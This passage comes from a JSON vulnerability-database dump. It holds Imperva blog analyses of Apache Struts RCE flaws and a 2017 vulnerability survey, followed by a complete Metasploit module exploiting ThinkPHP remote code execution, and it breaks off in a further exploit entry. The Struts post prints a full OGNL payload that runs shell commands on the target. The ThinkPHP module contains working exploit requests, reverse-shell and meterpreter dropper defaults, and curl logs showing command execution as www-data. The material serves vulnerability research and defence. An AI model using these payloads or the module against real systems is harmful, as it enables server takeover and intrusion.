Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. 
Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "type": "impervablog", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. 
Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. 
In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. 
It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. 
Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of a huge DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notorious for its poor security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected to be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7), which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and a half with no updates, which can explain the growth in the number of vulnerabilities in 2016. 
Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. 
These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:50", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. 
The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. 
According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. 
Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-09-08T16:10:08", "type": "impervablog", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2020-04-21T06:58:41", "description": "", "cvss3": {}, "published": "2020-04-14T00:00:00", "type": "packetstorm", "title": "ThinkPHP 5.0.23 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-20062", "CVE-2019-9082"], "modified": "2020-04-14T00:00:00", "id": "PACKETSTORM:157218", "href": "https://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ThinkPHP Multiple PHP Injection RCEs', \n'Description' => %q{ \nThis module exploits one of two PHP injection vulnerabilities in the \nThinkPHP web framework to execute code as the web user. \n \nVersions up to and including 5.0.23 are exploitable, though 5.0.23 is \nvulnerable to a separate vulnerability. The module will automatically \nattempt to detect the version of the software. \n \nTested against versions 5.0.20 and 5.0.23 as can be found on Vulhub. 
\n}, \n'Author' => [ \n# Discovery by unknown threaty threat actors \n'wvu' # Module \n], \n'References' => [ \n# https://www.google.com/search?q=thinkphp+rce, tbh \n['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP \n['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP \n['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce'] \n], \n'DisclosureDate' => '2018-12-10', # Unknown discovery date \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} \n], \n['Linux Dropper', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# NOTE: You may want to tweak this for long-running commands like find(1) \nOptFloat.new('CmdOutputTimeout', \n[true, 'Timeout for cmd/unix/generic output', 3.5]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n=begin \nwvu@kharak:~$ curl -vs \"http://127.0.0.1:8080/index.php?s=$((RANDOM))\" | xmllint --html --xpath 'substring-after(//div[@class = \"copyright\"]/span[1]/text(), \"V\")' - \n* Trying 127.0.0.1... 
\n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) \n> GET /index.php?s=1353 HTTP/1.1 \n> Host: 127.0.0.1:8080 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> \n< HTTP/1.1 404 Not Found \n< Date: Mon, 13 Apr 2020 06:42:15 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.5 \n< Content-Length: 7332 \n< Content-Type: text/html; charset=utf-8 \n< \n{ [7332 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \n5.0.20wvu@kharak:~$ \n=end \ndef check \n# An unknown route will trigger the ThinkPHP copyright with version \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => {'s' => rand_text_alpha(8..42)} \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m) \nreturn CheckCode::Unknown( \n'Target did not respond with ThinkPHP copyright.' \n) \nend \n \n# Get the first copyright <span> containing the version \nversion = res.get_html_document.at('//div[@class = \"copyright\"]/span')&.text \n \nunless (version = version.scan(/^V([\\d.]+)$/).flatten.first) \nreturn CheckCode::Detected( \n'Target did not respond with ThinkPHP version.' 
\n) \nend \n \n# Make the parsed version a comparable ivar for automatic exploitation \n@version = Gem::Version.new(version) \n \nif @version <= Gem::Version.new('5.0.23') \nreturn CheckCode::Appears(\"ThinkPHP #{@version} is a vulnerable version.\") \nend \n \nCheckCode::Safe(\"ThinkPHP #{@version} is NOT a vulnerable version.\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# This is just extra insurance in case I screwed up the check method \nunless @version \nfail_with(Failure::NoTarget, 'Could not detect ThinkPHP version') \nend \n \nprint_status(\"Targeting ThinkPHP #{@version} automatically\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# XXX: Only opts[:noconcat] may induce responses from the server \nexecute_cmdstager \nelse # This is just extra insurance in case I screwed up the info hash \nfail_with(Failure::NoTarget, \"Could not select target #{target['Type']}\") \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nif @version < Gem::Version.new('5.0.23') \nexploit_less_than_5_0_23(cmd) \nelsif @version == Gem::Version.new('5.0.23') \nexploit_5_0_23(cmd) \nelse # This is just extra insurance in case I screwed up the exploit method \nfail_with(Failure::NoTarget, \"Could not target ThinkPHP #{@version}\") \nend \nend \n \n=begin \nwvu@kharak:~$ curl -gvs \"http://127.0.0.1:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id\" | head -1 \n* Trying 127.0.0.1... 
\n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) \n> GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1 \n> Host: 127.0.0.1:8080 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> \n< HTTP/1.1 200 OK \n< Date: Mon, 13 Apr 2020 06:43:45 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.5 \n< Vary: Accept-Encoding \n< Transfer-Encoding: chunked \n< Content-Type: text/html; charset=UTF-8 \n< \n{ [60 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwvu@kharak:~$ \n=end \ndef exploit_less_than_5_0_23(cmd) \n# XXX: The server may block on executing our payload and won't respond \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => { \n's' => '/Index/\\\\think\\\\app/invokefunction', \n'function' => 'call_user_func_array', \n'vars[0]' => 'system', # TODO: Debug ARCH_PHP \n'vars[1][]' => cmd \n}, \n'partial' => true \n}, datastore['CmdOutputTimeout']) \n \nreturn unless res && res.code == 200 \n \nvprint_good(\"Successfully executed command: #{cmd}\") \n \nreturn unless datastore['PAYLOAD'] == 'cmd/unix/generic' \n \n# HACK: Print half of the doubled-up command output \nvprint_line(res.body[0, res.body.length / 2]) \nend \n \n=begin \nwvu@kharak:~$ curl -vsd \"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id\" http://127.0.0.1:8081/index.php?s=captcha | head -1 \n* Trying 127.0.0.1... 
\n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0) \n> POST /index.php?s=captcha HTTP/1.1 \n> Host: 127.0.0.1:8081 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> Content-Length: 72 \n> Content-Type: application/x-www-form-urlencoded \n> \n} [72 bytes data] \n* upload completely sent off: 72 out of 72 bytes \n< HTTP/1.1 200 OK \n< Date: Mon, 13 Apr 2020 06:44:05 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.12 \n< Vary: Accept-Encoding \n< Transfer-Encoding: chunked \n< Content-Type: text/html; charset=UTF-8 \n< \n{ [60 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwvu@kharak:~$ \n=end \ndef exploit_5_0_23(cmd) \n# XXX: The server may block on executing our payload and won't respond \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => {'s' => 'captcha'}, \n'vars_post' => { \n'_method' => '__construct', \n'filter[]' => 'system', # TODO: Debug ARCH_PHP \n'method' => 'get', \n'server[REQUEST_METHOD]' => cmd \n}, \n'partial' => true \n}, datastore['CmdOutputTimeout']) \n \nreturn unless res && res.code == 200 \n \nvprint_good(\"Successfully executed command: #{cmd}\") \n \nreturn unless datastore['PAYLOAD'] == 'cmd/unix/generic' \n \n# Clean up output from cmd/unix/generic \nvprint_line(res.body.gsub(/\\n<!DOCTYPE html>.*/m, '')) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157218/thinkphp_rce.rb.txt"}, {"lastseen": "2016-12-05T22:16:25", "description": "", "cvss3": {}, "published": "2013-03-22T00:00:00", "type": "packetstorm", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": 